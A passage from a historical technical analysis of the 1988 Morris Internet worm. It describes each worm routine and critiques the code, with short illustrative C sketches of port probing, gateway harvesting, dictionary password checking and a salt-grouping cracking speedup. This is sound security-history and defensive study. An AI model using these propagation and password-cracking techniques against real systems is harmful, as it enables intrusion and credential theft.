- permute, rt_init, supports_rsh, and supports_telnet. network &
- password attacks : attack_network, attack_user, crack_0, crack_1,
- crack_2, crack_3, cracksome, ha, hg, hi, hl, hul, infect,
- scan_gateways, sendworm, try_fingerd, try_password, try_rsh,
- try_sendmail, and waithit. camouflage: checkother, other_sleep,
- send_message, and xorbuf.
-
- 5.2.1. main
-
- This was where the program started. The first thing it did was
- change its argument vector to make it look like it was the shell
- running. Next, it set its resource limits so a failure would not
- drop a core file. Then it loaded all the files named on the
- command line into the object structure in memory using calls to
- loadobject. If the file was not one of the objects loaded, the
- worm would immediately call exit. Next, the code unlinked all the
- object files, the file named sh (the worm itself), and the file
- /tmp/.dumb (apparently a remnant of some earlier version of the
- program, possibly used as a restraint or log during
- testing; the file is not otherwise referenced). The program
- then finished zeroing out the argument vector. Next, the code
- would call if_init. If no interfaces were discovered by that
- routine, the program would call exit. The program would then get
- its current process group. If the process group was the same as
- its parent process id (passed on the command line), it would
- reset its process group and send a KILL signal to its parent.
- Last of all, the routine doit was invoked.
-
- 5.2.2. doit
-
- This was the main worm code. First, a variable was set to the
- current time with a call to time, and the random number generator
- was initialized with the return value. Next, the routines hg and
- hl were invoked to infect some hosts. If one or both of these
- failed to infect any hosts, the routine ha was invoked. Next, the
- routine checkother was called to see if other worms were on this
- host. The routine send_message was also called to cast suspicion
- on the folks at Berkeley.
-
- The code then entered an infinite loop: A call would be made to
- cracksome followed by a call to other_sleep with a parameter of
- 30. Then cracksome would be called again. At this point, the
- process would fork itself, and the parent would exit, leaving the
- child to continue. Next, the routines hg, ha, and hi would all be
- called to infect other hosts. If any one (or combination) of
- these routines failed to infect a new host, the routine hl would
- be called to infect a local host. Thus, the code was aggressive
- about always infecting at least one host each pass through this
- loop. The logic here was faulty, however, because if all known
- gateway hosts were infected, or a bad set of host numbers were
- tried in ha, this code would call hl every time through the loop.
- Such behavior was one of the reasons hosts became overloaded with
- worm processes: every pass through the loop, each worm would
- likely be forced to infect another local host. Considering that
- multiple worms could run on a host for some time before one would
- exit, this could lead to an exponential growth of worms in a LAN
- environment. Next, the routine other_sleep was called with a
- timeout of 120. A check was then made to see if the worm had run
- for more than 12 hours. If so, a call was made to h_clean.
- Finally, a check was made of the pleasequit and nextw variables
- (set in other_sleep or checkother, and crack_2, respectively).
- If pleasequit was nonzero, and nextw was greater than 10, the
- worm would exit.
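-
- The loop just described can be summarized in schematic C. The
- routine names are those used in this report, but the fragment is a
- paraphrase with stub definitions added so it is self-contained; it
- is not the decompiled code:
-
- #include <stdlib.h>
- #include <time.h>
- #include <unistd.h>
-
- /* Stub stand-ins so the schematic compiles; each infection routine
-    returns nonzero when it infects a new host. */
- static int hg(void) { return 0; }
- static int ha(void) { return 0; }
- static int hi(void) { return 0; }
- static int hl(void) { return 0; }
- static void cracksome(void) {}
- static void other_sleep(int t) { sleep((unsigned) t); }
- static void h_clean(void) {}
- static int pleasequit, nextw;
-
- static void doit_loop(time_t start)
- {
-     for (;;) {
-         cracksome();
-         other_sleep(30);
-         cracksome();
-         if (fork() > 0)
-             exit(0);               /* parent exits; child carries on  */
-         if (!(hg() | ha() | hi()))  /* all three are called; if none  */
-             hl();                   /* succeeds (one reading of the   */
-                                     /* text), fall back to hl         */
-         other_sleep(120);
-         if (time(NULL) - start > 12 * 60 * 60)
-             h_clean();             /* flush infected/immune entries   */
-         if (pleasequit && nextw > 10)
-             exit(0);               /* deferred self-destruction       */
-     }
- }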
-
- 5.2.3. attack_network
-
- This routine was designed to infect random hosts on a subnet.
- First, for each of the network interfaces, it checked to see if
- the target host was on a network to which the current host was
- directly connected. If so, the routine immediately returned.
- Based on the class of the netmask (e.g., Class A, Class B), the
- code constructed a list of likely network numbers. A special
- algorithm was used to make good guesses at potential Class A host
- numbers. All these constructed host numbers were placed in a
- list, and the list was then randomized using permute. If the
- network was Class B, the permutation was done to favor low-
- numbered hosts by doing two separate permutations: the first
- six hosts in the output list were guaranteed to be chosen from
- the first dozen (low-numbered) host numbers generated. The
- first 20 entries in the permuted list were the only ones
- examined. For each such IP address, its entry was retrieved from
- the global list of hosts (if it was in the list). If the host
- was in the list and was marked as already infected or immune, it
- was ignored. Otherwise, a check was made to see if the host
- supported the rsh command (identifying it as existing and having
- BSD-derived networking services) by calling supports_rsh. If the
- host did support rsh, it was entered into the hosts list if not
- already present, and a call to infect was made for that host. If
- a successful infection occurred, the routine returned early with
- a value of TRUE (1).
-
- 5.2.4. attack_user
-
- This routine was called after a user password was broken. It has
- some incorrect code and may not work properly on every
- architecture because a subroutine call was missing an argument.
- However, on Suns and VAXen, the code will work because the
- missing argument was supplied as an extra argument to the
- previous call, and the order of the arguments on the stack
- matches between the two routines. It was largely a coincidence
- that this worked. The routine attempted to open a .forward file
- in the user's home directory, and then for each host and user
- name present in that file, it called the hul routine. It then did
- the same thing with the .rhosts file, if present, in the user's
- home directory.
-
- 5.2.5. checkother
-
- This routine checked to see if another worm was present on this
- machine and is a companion routine to other_sleep. First, a
- random value was checked: with a probability of 1 in 7, the
- routine returned without ever doing anything; these worms
- became immortal in the sense that they never again participated
- in the process of thinning out multiple local worms. Otherwise,
- the worm created a socket and tried to connect to the local
- ``worm port,'' 23357. If the connection was successful, an
- exchange of challenges was made to verify that the other side was
- actually a fellow worm. If so, a random value was written to the
- other side, and a value was read from the socket. If the sum of
- the value sent plus the value read was even, the local worm set
- its pleasequit variable to 1, thus marking it for eventual self-
- destruction. The socket was then closed, and the worm opened a
- new socket on the same port (if it was not destined to self-
- destruct) and set other_fd to that socket to listen for other
- worms. If any errors were encountered during this procedure, the
- worm involved set other_fd to -1 and it returned from the
- routine. This meant that any error caused the worm to be
- immortal, too.
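-
- The exchange can be pictured with a short sketch. The names are
- invented, and error handling is reduced to the ``stay immortal''
- behavior described above:
-
- #include <stdlib.h>
- #include <unistd.h>
-
- /* Coin toss between two local worms over an already-verified
-    socket: each side sends a random value; a nonzero return means
-    the local worm should set pleasequit. */
- static int coin_toss(int fd)
- {
-     long mine = random() & 0x00ffffffL, theirs = 0;
-
-     if (write(fd, &mine, sizeof mine) != (ssize_t) sizeof mine ||
-         read(fd, &theirs, sizeof theirs) != (ssize_t) sizeof theirs)
-         return 0;                       /* any error: stay immortal    */
-     return ((mine + theirs) & 1) == 0;  /* even sum: mark this worm    */
- }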
-
- 5.2.6. crack_0
-
- This routine first scanned the /etc/hosts.equiv file, adding new
- hosts to the global list of hosts and setting the flags field
- to mark them as equivalent. Calls were made to name2host and
- getaddrs. Next, a similar scan was made of the /.rhosts file
- using the exact same calls. The code then called setpwent to open
- the /etc/passwd file. A loop was performed as long as passwords
- could be read: Every 10th entry, a call was made to other_sleep
- with a timeout of 0. For each user, an attempt was made to open
- the file .forward
- in the home directory of that user, and read the hostnames
- therein. These hostnames were also added to the host list and
- marked as equivalent. The encrypted password, home directory, and
- gecos field for each user was stored into the pwd structure.
- After all user entries were read, the endpwent routine was
- invoked, and the cmode variable was set to 1.
-
- 5.2.7. crack_1
-
- This routine tried to break passwords. It looped until all
- accounts had been tried, or until the next group of 50 accounts
- had been tested. In the loop: A call was made to other_sleep with
- a parameter of zero each time the loop index modulo 10 was zero
- (i.e., every 10 calls). Repeated calls were made to
- try_password with the values discussed earlier in §4-8b. Once
- all accounts had been tried, the variable cmode was set to 2.
-
- 5.2.8. crack_2
-
- This routine used the mini-dictionary in an attempt to break user
- passwords (see Appendix A). The dictionary was first permuted
- (using the permute call). Each word was decrypted in place by
- XORing its bytes with 0x80. The decrypted word was then passed to
- the try_password routine for each user account. The word was then
- re-encrypted. A global index, named nextw was incremented to
- point to the next dictionary entry. The nextw index is also used
- in doit to determine if enough effort had been expended so that
- the worm could ``...go gently into that good night.'' When no
- more words were left, the variable cmode was set to 3. There are
- two interesting points to note in this routine: the reverse of
- these words were not tried, although that would seem like a
- logical thing to do, and all words were encrypted and decrypted
- in place rather than in a temporary buffer. This is less
- efficient than a copy while masking since no re-encryption ever
- needs to be done. As discussed in the next section, many examples
- of unnecessary effort such as this were present in the program.
- Furthermore, the entire mini-dictionary was decrypted all at once
- rather than a word at a time. This would seem to lessen the
- benefit of encrypting those words at all, since the entire
- dictionary would then be present in memory as plaintext during
- the time all the words were tried.
-
- 5.2.9. crack_3
-
- This was the last password cracking routine. It opened
- /usr/dict/words, and for each word found it called try_password
- against each account. If the first letter of the word was a
- capital, it was converted to lower case and retried. After all
- words were tried, the variable cmode was incremented and the
- routine returned. In this routine, no calls to other_sleep were
- interspersed, thus leading to processes that ran for a long time
- before checking for other worms on the local machine. Also of
- note, this routine did not try the reverse of words either!
-
- 5.2.10. cracksome
-
- This routine was a simple switch statement on an external
- variable named cmode and it implemented the five strategies
- discussed in §4-8 of this paper. State zero called crack_0,
- state one called crack_1, state two called crack_2, and state
- three called crack_3. The default case simply returned.
-
- 5.2.11. crypt
-
- This routine took a key and a salt, then performed the UNIX
- password encryption function on a block of zero bits. The return
- value of the routine was a pointer to a character string of 13
- characters representing the encoded password. The routine was
- highly optimized and differs considerably from the standard
- library version of the same routine. It called the following
- routines: compkeys, mungE, des, and ipi. A routine, setupE, was
- also present and was associated with this code, but it was never
- referenced. It appears to duplicate the functionality of the
- mungE function.
-
- 5.2.12. h_addaddr
-
- This routine added alternate addresses to a host entry in the
- global list if they were not already present.
-
- 5.2.13. h_addname
-
- This routine added host aliases \(names\) to a given host entry.
- Duplicate entries were suppressed.
-
- 5.2.14. h_addr2host
-
- The host address provided to the routine was checked against each
- entry in the global host list to see if it was already present.
- If so, a pointer to that host entry was returned. If not, and if
- a parameter flag was set, a new entry was initialized with the
- argument address and a pointer to it was returned.
-
- 5.2.15. h_clean
-
- This routine traversed the host list and removed any entries
- marked as infected or immune (leaving hosts not yet tried).
-
- 5.2.16. h_name2host
-
- Just like h_addr2host except the comparison was done by name with
- all aliases.
-
- 5.2.17. ha
-
- This routine tried to infect hosts on remote networks. First, it
- checked to see if the gateways list had entries; if not, it
- called rt_init. Next, it constructed a list of all IP addresses
- for gateway hosts that responded to the try_telnet routine. The
- list of host addresses was randomized by permute. Then, for each
- address in the list so constructed, the address was masked with
- the value returned by netmaskfor and the result was passed to the
- attack_network routine. If an attack was successful, the routine
- exited early with a return value of TRUE.
-
- 5.2.18. hg
-
- This routine attempted to infect gateway machines. It first
- called rt_init to reinitialize the list of gateways, and then for
- each gateway it called the main infection routine, infect, with
- the gateway as an argument. As soon as one gateway was
- successfully infected, the routine returned TRUE.
-
- 5.2.19. hi
-
- This routine tried to infect hosts whose entries in the hosts
- list were marked as equivalent. The routine traversed the global
- host list looking for such entries and then calling infect with
- those hosts. A successful infection returned early with the value
- TRUE.
-
- 5.2.20. hl
-
- This routine was intended to attack hosts on directly-connected
- networks. For each alternate address of the current host, the
- routine attack_network was called with an argument consisting of
- the address logically and-ed with the value of netmask for that
- address. A success caused the routine to return early with a
- return value of TRUE.
-
- 5.2.21. hul
-
- This function attempted to attack a remote host via a particular
- user. It first checked to make sure that the host was not the
- current host and that it had not already been marked as infected.
- Next, it called getaddrs to be sure there was an address to be
- used. It examined the username for punctuation characters, and
- returned if any were found. It then called other_sleep with an
- argument of 1. Next, the code tried the attacks described in
- §4-10. Calls were made to sendworm if either attack succeeded
- in establishing a shell on the remote machine.
-
- 5.2.22. if_init
-
- This routine constructed the list of interfaces using ioctl
- calls. In summary, it obtained information about each interface
- that was up and running, including the destination address in
- point-to-point links, and any netmask for that interface. It
- initialized the me pointer to the first non-loopback address
- found, and it entered all alternate addresses in the address
- list.
-
- 5.2.23. infect
-
- This was the main infection routine. First, the host argument was
- checked to make sure that it was not the current host, that it
- was not currently infected, and that it had not been determined
- to be immune. Next, a check was made to be sure that an address
- for the host could be found by calling getaddrs. If no address
- was found, the host was marked as immune and the routine returned
- FALSE. Next, the routine called other_sleep with a timeout of 1.
- Following that, it tried, in succession, calls to try_rsh,
- try_fingerd, and try_sendmail. If the calls to try_rsh or
- try_fingerd
-
- succeeded, the file descriptors established by those invocations
- were passed as arguments to the sendworm call. If any of the
- three infection attempts succeeded, infect returned early with a
- value of TRUE. Otherwise, the routine returned FALSE.
-
- 5.2.24. loadobject
-
- This routine read an object file into the objects structure in
- memory. The file was opened and the size found with a call to the
- library routine fstat. A buffer was malloc'd of the appropriate
- size, and a call to read was made to read the contents of the
- file. The buffer was encrypted with a call to xorbuf, then
- transferred into the objects array. The suffix of the name
- (e.g., sun3.o, l1.c, vax.o) was saved in a field in the
- structure, as was the size of the object.
-
- 5.2.25. makemagic
-
- The routine used the library random call to generate a random
- number for use as a challenge number. Next, it tried to connect
- to the telnet port \(#23\) of the target host, using each
- alternate address currently known for that host. If a successful
- connection was made, the library call getsockname was called to
- get the canonical IP address of the current host relative to the
- target. Next, up to 1024 attempts were made to establish a TCP
- socket, using port numbers generated by taking the output of the
- random number generator modulo 32767. If the connection was
- successful, the routine returned the port number, the file
- descriptor of the socket, the canonical IP address of the current
- host, and the challenge number.
-
- 5.2.26. netmaskfor
-
- This routine stepped through the interfaces array and checked the
- given address against those interfaces. If it found that the
- address was reachable through a connected interface, the netmask
- returned was the netmask associated with that interface.
- Otherwise, the return was the default netmask based on network
- type \(Class A, Class B, Class C\).
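-
- For readers unfamiliar with classful addressing, the fallback case
- amounts to looking at the leading bits of the address. A small
- sketch of that default, with the address assumed to be in host
- byte order and the function name my own:
-
-      unsigned long
-      default_netmask(unsigned long addr)
-      {
-          if ((addr & 0x80000000UL) == 0)
-              return 0xff000000UL;      /* Class A: 255.0.0.0 */
-          if ((addr & 0xc0000000UL) == 0x80000000UL)
-              return 0xffff0000UL;      /* Class B: 255.255.0.0 */
-          return 0xffffff00UL;          /* Class C and above: 255.255.255.0 */
-      }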
-
- 5.2.27. other_sleep
-
- This routine checked a global variable named other_fd. If the
- variable was less than zero, the routine simply called sleep with
- the provided timeout argument, then returned. Otherwise, the
- routine waited on a select system call for up to the value of the
- timeout. If the timeout expired, the routine returned. Otherwise,
- if the select return code indicated there was input pending on
- the other_fd descriptor, it meant there was another worm on the
- current machine. A connection was established and an exchange of
- ``magic'' numbers was made to verify identity. The local worm
- then wrote a random number \(produced by random\) to the other
- worm via the socket. The reply was read and a check was made to
- ensure that the response came from the localhost \(127.0.0.1\).
- The file descriptor was closed. If the random value sent plus the
- response was an odd number, the other_fd variable was set to -1
- and the pleasequit variable was set to 1. This meant that the
- local worm would die when conditions were right \(cf. doit \),
- and that it would no longer attempt to contact other worms on the
- local machine. If the sum was even, the other worm was destined
- to die.
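-
- The waiting half of this routine can be pictured with the hedged
- sketch below: sleep for the timeout, but wake early if a peer worm
- tries to talk on other_fd. The function name and return convention
- are assumptions for illustration; the challenge exchange and the
- parity test on the sum of the two random values, which decided
- which instance set pleasequit, are not shown.
-
-      #include <sys/types.h>
-      #include <sys/time.h>
-      #include <sys/select.h>
-      #include <unistd.h>
-
-      extern int other_fd;          /* rendezvous descriptor, -1 if unused */
-
-      int
-      wait_or_listen(int timeout)
-      {
-          fd_set readfds;
-          struct timeval tv;
-
-          if (other_fd < 0) {       /* no rendezvous socket: just sleep */
-              sleep(timeout);
-              return 0;
-          }
-          FD_ZERO(&readfds);
-          FD_SET(other_fd, &readfds);
-          tv.tv_sec = timeout;
-          tv.tv_usec = 0;
-          if (select(other_fd + 1, &readfds, NULL, NULL, &tv) <= 0)
-              return 0;             /* timed out or error: nothing pending */
-          return 1;                 /* another local worm is calling */
-      }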
-
- 5.2.28. permute
-
- This routine randomized the order of a list of objects. This was
- done by executing a loop once for each item in the list. In each
- iteration of the loop, the random number generator was called
- modulo the number of items in the list. The item in the list
- indexed by that value was swapped with the item in the list
- indexed by the current loop value \(via a call to bcopy\).
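-
- The randomizing pass is easy to picture. This sketch mirrors the
- description, swapping each element with one chosen by random()
- modulo the list length; it operates on an array of pointers for
- brevity, where the worm reportedly used bcopy on list elements.
-
-      #include <stdlib.h>
-
-      void
-      permute_list(void **item, int n)
-      {
-          int i, j;
-          void *tmp;
-
-          for (i = 0; i < n; i++) {
-              j = random() % n;     /* pick any slot, as described above */
-              tmp = item[i];
-              item[i] = item[j];
-              item[j] = tmp;
-          }
-      }
-
- Note that this swap-with-random-slot pass is not a statistically
- uniform shuffle in the way the Fisher-Yates method is, but it
- matches the behavior described and was adequate for the worm's
- purpose of varying the order of trials.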
-
- 5.2.29. rt_init
-
- This initialized the list of gateways. It started by setting an
- external counter, ngateways, to zero. Next, it invoked the
- command ``/usr/ucb/netstat -r -n'' using a popen call. The code
- then looped while output was received from the netstat command: A
- line was read. A call to other_sleep was made with a timeout of
- zero. The input line was parsed into a destination and a gateway.
- If the gateway was not a valid IP address, or if it was the
- loopback address \(127.0.0.1\), it was discarded. The value was
- then compared against all the gateway addresses already known;
- duplicates were skipped. It was also compared against the list of
- local interfaces \(local networks\), and discarded if a
- duplicate. Otherwise, it was added to the list of gateways and
- the counter incremented.
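-
- A hedged sketch of the same gathering technique appears below,
- using popen to run netstat and inet_addr to reject non-numeric
- fields. Buffer sizes, field handling, and the function name are
- assumptions for illustration, and the interleaved calls to
- other_sleep are omitted.
-
-      #include <stdio.h>
-      #include <string.h>
-      #include <netinet/in.h>
-      #include <arpa/inet.h>
-
-      int
-      collect_gateways(char gateways[][20], int max)
-      {
-          FILE *fp;
-          char line[256], dest[64], gw[64];
-          int n = 0, i;
-
-          if ((fp = popen("/usr/ucb/netstat -r -n", "r")) == NULL)
-              return 0;
-          while (n < max && fgets(line, sizeof(line), fp) != NULL) {
-              if (sscanf(line, "%63s %63s", dest, gw) != 2)
-                  continue;
-              if (inet_addr(gw) == INADDR_NONE)   /* not a numeric address */
-                  continue;
-              if (strcmp(gw, "127.0.0.1") == 0)   /* skip the loopback route */
-                  continue;
-              for (i = 0; i < n; i++)             /* skip duplicates */
-                  if (strcmp(gateways[i], gw) == 0)
-                      break;
-              if (i == n && strlen(gw) < 20)
-                  strcpy(gateways[n++], gw);
-          }
-          pclose(fp);
-          return n;                               /* gateways collected */
-      }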
-
- 5.2.30. scan_gateways
-
- First, the code called permute to randomize the gateways list.
- Next, it looped over each gateway or the first 20, whichever was
- less: A call was made to other_sleep with a timeout of zero. The
- gateway IP address was searched for in the host list; a new entry
- was allocated for the host if none currently existed. The gateway
- flag was set in the flags field of the host entry. A call was
- made to the library routine gethostbyaddr with the IP number of
- the gateway. The name, aliases and address fields were added to
- the host list, if not already present. Then a call was made to
- gethostbyname and alternate addresses were added to the host
- list. After this loop was executed, a second loop was started
- that did effectively the same thing as the first! There is no
- clear reason why this was done, unless it is a remnant of earlier
- code, or a stub for future additions.
-
- 5.2.31. send_message
-
- This routine made a call to random and 14 out of 15 times
- returned without doing anything. In the 15th case, it opened a
- stream socket to host ``ernie.berkeley.edu'' and then tried to
- send an uninitialized byte using the sendto call. This would not
- work \(using a UDP send on a TCP socket\).
-
- 5.2.32. sendworm
-
- This routine sent the worm code over a connected TCP circuit to a
- remote machine. First it checked to make sure that the objects
- table held a copy of the l1.c code \(see Appendix B\). Next, it
- called makemagic to get a local socket established and to
- generate a challenge string. Then, it encoded and wrote the
- script detailed previously in §4-2a. Finally, it called
- waithit and returned the result code of that routine. The object
- files shipped across the link were decrypted in memory first by a
- call to xorbuf and then re-encrypted afterwards.
-
- 5.2.33. supports_rsh
-
- This routine determined if the target host, specified as an
- argument, supported the BSD-derived rsh protocol. It did this by
- creating a socket and attempting a TCP connection to port 514 on
- the remote machine. A timeout or connect failure caused a return
- of FALSE; otherwise, the socket was closed and the return value
- was TRUE.
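-
- Both this routine and supports_telnet reduce to the same small
- idiom: attempt a TCP connection to a well-known port and report
- whether anything answered. A minimal sketch, with the timeout
- handling the worm used omitted and the function name my own:
-
-      #include <string.h>
-      #include <unistd.h>
-      #include <sys/socket.h>
-      #include <netinet/in.h>
-      #include <arpa/inet.h>
-
-      int
-      port_open(unsigned long addr, int port)  /* addr in network byte order */
-      {
-          struct sockaddr_in sin;
-          int s;
-
-          if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
-              return 0;
-          memset(&sin, 0, sizeof(sin));
-          sin.sin_family = AF_INET;
-          sin.sin_addr.s_addr = addr;
-          sin.sin_port = htons(port);
-          if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
-              close(s);
-              return 0;             /* refused, unreachable, or timed out */
-          }
-          close(s);
-          return 1;                 /* something is listening there */
-      }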
-
- 5.2.34. supports_telnet
-
- This routine determined if a host was reachable and supported the
- telnet protocol \(i.e., was probably not a router or similar
- ``dumb'' box\). It was similar to supports_rsh in nature. The
- code established a socket, connected to the remote machine on
- port 23, and returned FALSE if an error or timeout occurred;
- otherwise, the socket was closed and TRUE was returned.
-
- 5.2.35. try_fingerd
-
- This routine tried to establish a connection to a remote finger
- daemon on the given host by connecting to port 79. If the
- connection succeeded, it sent across an overfull buffer as
- described in §4-8b and waited to see if the other side became
- a shell. If so, it returned the file descriptors to the caller;
- otherwise, it closed the socket and returned a failure code.
-
- 5.2.36. try_password
-
- This routine called crypt with the password attempt and compared
- the result against the encrypted password in the pwd entry for
- the current user. If a match was found, the unencrypted password
- was copied into the pwd structure, and the routine attack_user
- was invoked.
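-
- The comparison itself is the standard idiom for checking a UNIX
- password guess, sketched below with the library crypt. The worm
- actually used its own, much faster crypt implementation, discussed
- later in this report; the function name here is an assumption for
- illustration.
-
-      #define _XOPEN_SOURCE
-      #include <string.h>
-      #include <unistd.h>
-
-      int
-      password_matches(const char *guess, const char *encrypted)
-      {
-          char salt[3], *result;
-
-          salt[0] = encrypted[0];   /* the first two characters are the salt */
-          salt[1] = encrypted[1];
-          salt[2] = '\0';
-          result = crypt(guess, salt);
-          return result != NULL && strcmp(result, encrypted) == 0;
-      }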
-
- 5.2.37. try_rsh
-
- This function created two pipes and then forked a child process.
- The child process attempted to rexec a remote shell on the host
- specified in the parameters, using the specified username and
- password. Then the child process tried to invoke the rsh command
- by attempting to run, in order, ``/usr/ucb/rsh,''
- ``/usr/bin/rsh,'' and ``/bin/rsh.'' If the remote shell
- succeeded, the function returned the file descriptors of the open
- pipe. Otherwise, it closed all file descriptors, killed the child
- with a SIGKILL, and reaped it with a call to wait3.
-
- 5.2.38. try_sendmail
-
- This routine attempted to establish a connection to the SMTP port
- \(#25\) on the remote host. If successful, it conducted the
- dialog explained in §4-2b. It then called the waithit routine
- to see if the infection ``took.'' Return codes were checked after
- each line was transmitted, and if a return code indicated a
- problem, the routine aborted after sending a ``quit'' message.
-
- 5.2.39. waithit
-
- This function acted as the bootstrap server for a vector program
- on a remote machine. It waited for up to 120 seconds on the
- socket created by the makemagic routine, and if no connection was
- made it closed the socket and returned a failure code. Likewise,
- if the first thing received was not the challenge string shipped
- with the bootstrap program, the socket was closed and the routine
- returned. The routine decrypted each object file using xorbuf and
- sent it across the connection to the vector program \(see
- Appendix B\). Then a script was transmitted to compile and run
- the vector. This was described in §4-4. If the remote host was
- successfully infected, the infected flag was set in the host
- entry and the socket closed. Otherwise, the routine sent rm
- command strings to delete each object file. The function returned
- the success or failure of the infection.
-
- 5.2.40. xorbuf
-
- This routine was somewhat peculiar. It performed a simple
- encryption/decryption function by XORing the buffer passed as an
- argument with the first 10 bytes of the xorbuf routine itself!
- This code would not work on a machine with a split I/D space or
- on tagged architectures.
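-
- The idea can be reconstructed roughly as follows; this is an
- illustrative sketch rather than the worm's code, and the cast of a
- function pointer to a data pointer is deliberately non-portable,
- which is exactly why the trick fails on split I/D and tagged
- architectures.
-
-      void
-      xorbuf(char *buf, int len)
-      {
-          const char *key = (const char *)(void *)xorbuf;  /* own code bytes */
-          int i;
-
-          for (i = 0; i < len; i++)
-              buf[i] ^= key[i % 10];    /* first 10 bytes of the routine */
-      }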
-
- 6. Analysis of the Code
-
- 6.1. Structure and Style
-
- An examination of the reverse-engineered code of the worm is
- instructive. Although it is not the same as reading the original
- code, it does reveal some characteristics of the author\(s\). One
- conclusion that may surprise some people is that the quality of
- the code is mediocre, and might even be considered poor. For
- instance, there are places where calls are made to functions with
- either too many or too few arguments. Many routines have local
- variables that are either never used, or are potentially used
- before they are initialized. In at least one location, a struct
- is passed as an argument rather than the address of the struct.
- There is also dead code: routines that are never referenced, and
- code that cannot be executed because of conditions that are never
- met \(possibly bugs\). It appears that the author\(s\)
- never used the lint utility on the program. At many places in the
- code, there are calls on system routines and the return codes are
- never checked for success. In many places, calls are made to the
- system heap routine, malloc, and the result is immediately used
- without any check. Although the program was configured not to
- leave a core file or other evidence if a fatal failure occurred,
- the lack of simple checks on the return codes is indicative of
- sloppiness; it also suggests that the code was written and run
- with minimal or no testing. It is certainly possible that some
- checks were written into the code and elided subject to
- conditional compilation flags. However, there would be little
- reason to remove those checks from the production version of the
- code. The structures chosen for some of the internal data are
- also revealing. Everything was represented as linked lists of
- structures. All searches were done as linear passes through the
- appropriate list. Some of these lists could get quite long and
- doubtless considerable CPU time was spent by the worm just
- maintaining and searching these lists. A little extra code to
- implement hash buckets or some form of sorted lists would have
- added little overhead to the program, yet made it much more
- efficient \(and thus quicker to infect other hosts and less
- obvious to system watchers\). Linear lists may be easy to code,
- but any experienced programmer or advanced CS student should be
- able to implement a hash table or lists of hash buckets with
- little difficulty. Some effort was duplicated in spots. An
- example of this was in the code that tried to break passwords.
- Even if the password to an account had been found in an earlier
- stage of execution, the worm would encrypt every word in the
- dictionary and attempt a match against it. Similar redundancy can
- be found in the code to construct the lists of hosts to infect.
- There are locations in the code where it appears that the
- author\(s\) meant to execute a particular function but used the
- wrong invocation. The use of the UDP send on a TCP socket is one
- glaring example. Another example is at the beginning of the
- program where the code sends a KILL signal to its parent process.
- The surrounding code gives a strong indication that the author
- actually meant to do a killpg instead but used the wrong call.
- The one section of code that appears particularly well-thought-
- out involves the crypt routines used to check passwords. As has
- been noted in [Seel88], this code is nine times faster than the
- standard Berkeley crypt function. Many interesting modifications
- were made to the algorithm, and the routines do not appear to
- have been written by the same author as the rest of the code.
- Additionally, the routines involved have some support for both
- encryption and decryption, even though only encryption was
- needed for the worm. This supports the assumption that this
- routine was written by someone other than the author\(s\) of the
- program, and included with this code. It would be interesting to
- discover where this code originated and how it came to be in the
- Worm program. The program could have been much more virulent had
- the author\(s\) been more experienced or less rushed in her/his
- coding. However, it seems likely that this code had been
- developed over a long period of time, so the only conclusion that
- can be drawn is that the author\(s\) was sloppy or careless \(or
- both\), and perhaps that the release of the worm was premature.
-
- 6.2. Problems of Functionality
-
- There is little argument that the program was functional. In
- fact, we all wish it had been less capable! However, we are lucky
- in the sense that the program had flaws that prevented it from
- operating to the fullest. For instance, because of an error, the
- code would fail to infect hosts on a local area network even
- though it might identify such hosts. Another example of
- restricted functionality concerns the gathering of hostnames to
- infect. As noted already, the code failed to gather host names
- from user .rhosts files early on. It also did not attempt to
- collect host names from other user and system files containing
- such names \(e.g., /etc/hosts.lpd\). Many of the operations could
- have been done ``smarter.'' The case of using linear structures
- has already been mentioned. Another example would have been to
- sort user passwords by the salt used. If the same salt was
- present in more than one password, then all those passwords could
- be checked in parallel as a single pass was made through the
- dictionaries. On our machine, 5% of the 200 passwords share the
- same salt, for instance.
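-
- A hedged sketch of that optimization: group the password entries by
- their two-character salt so each dictionary word is encrypted only
- once per distinct salt. The structure, the names, and the fixed
- 1024-entry limit are assumptions made for the illustration.
-
-      #define _XOPEN_SOURCE
-      #include <stdio.h>
-      #include <string.h>
-      #include <unistd.h>
-
-      struct pwent {
-          char *name;
-          char *encrypted;          /* salt is the first two characters */
-      };
-
-      void
-      try_word_by_salt(const char *word, struct pwent *pw, int n)
-      {
-          char done[1024];          /* sketch assumes n <= 1024 */
-          char salt[3], *hash;
-          int i, j;
-
-          memset(done, 0, sizeof(done));
-          for (i = 0; i < n; i++) {
-              if (done[i])
-                  continue;
-              salt[0] = pw[i].encrypted[0];
-              salt[1] = pw[i].encrypted[1];
-              salt[2] = '\0';
-              hash = crypt(word, salt);      /* one encryption per salt */
-              for (j = i; j < n; j++) {
-                  if (pw[j].encrypted[0] != salt[0] ||
-                      pw[j].encrypted[1] != salt[1])
-                      continue;              /* different salt */
-                  done[j] = 1;
-                  if (hash != NULL && strcmp(hash, pw[j].encrypted) == 0)
-                      printf("%s: %s\n", pw[j].name, word);
-              }
-          }
-      }
-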
- No special advantage was taken if the root password was
- compromised. Once the root password has been
- broken, it is possible to fork children that set their uid and
- environment variables to match each designated user. These
- processes could then attempt the rsh attack described earlier in
- this report. Instead, root is treated as any other account. It
- has been suggested to me that this treatment of root may have
- been a conscious choice of the worm author\(s\). Without knowing
- the true motivation of the author, this is impossible to decide.
- However, considering the design and intent of the program, I find
- it difficult to believe that such exploitation would have been
- omitted if the author had thought of it. The same attack used on
- the finger daemon could have been extended to the Sun version of
- the program, but was not. The only explanations that come to mind
- why this was not done are that the author lacked the motivation,
- the ability, the time, or the resources to develop a version for
- the Sun. However, at a recent meeting, Professor Rick Rashid of
- Carnegie-Mellon University was heard to claim that Robert T.
- Morris, the alleged author of the worm, had revealed the fingerd
- bug to system administrative staff at CMU well over a year ago. [15]
- Assuming this report is correct and the worm author is indeed Mr.
- Morris, it is obvious that there was sufficient time to construct
- a Sun version of the code. In fact, I asked three Purdue graduate
- students \(Shawn D. Ostermann, Steve J. Chapin, and Jim N.
- Griffoen\) to develop a Sun 3 version of the attack, and they did
- so in under three hours. The Worm author certainly must have had
- access to Suns or else he would not have been able to provide Sun
- binaries to accompany the operational worm. Motivation should
- also not be a factor considering everything else present in the
- program. With time and resources available, the only reason I
- cannot immediately rule out is that he lacked the knowledge of
- how to implement a Sun version of the attack. This seems unlikely,
- but given the inconsistent nature of the rest of the code, it is
- certainly a possibility. However, if this is the case, it raises
- a new question: was the author of the Worm the original author of
- the VAX fingerd attack? Perhaps the most obvious shortcoming of
- the code is the lack of understanding about propagation and load.
- The reason the worm was spotted so quickly and caused so much
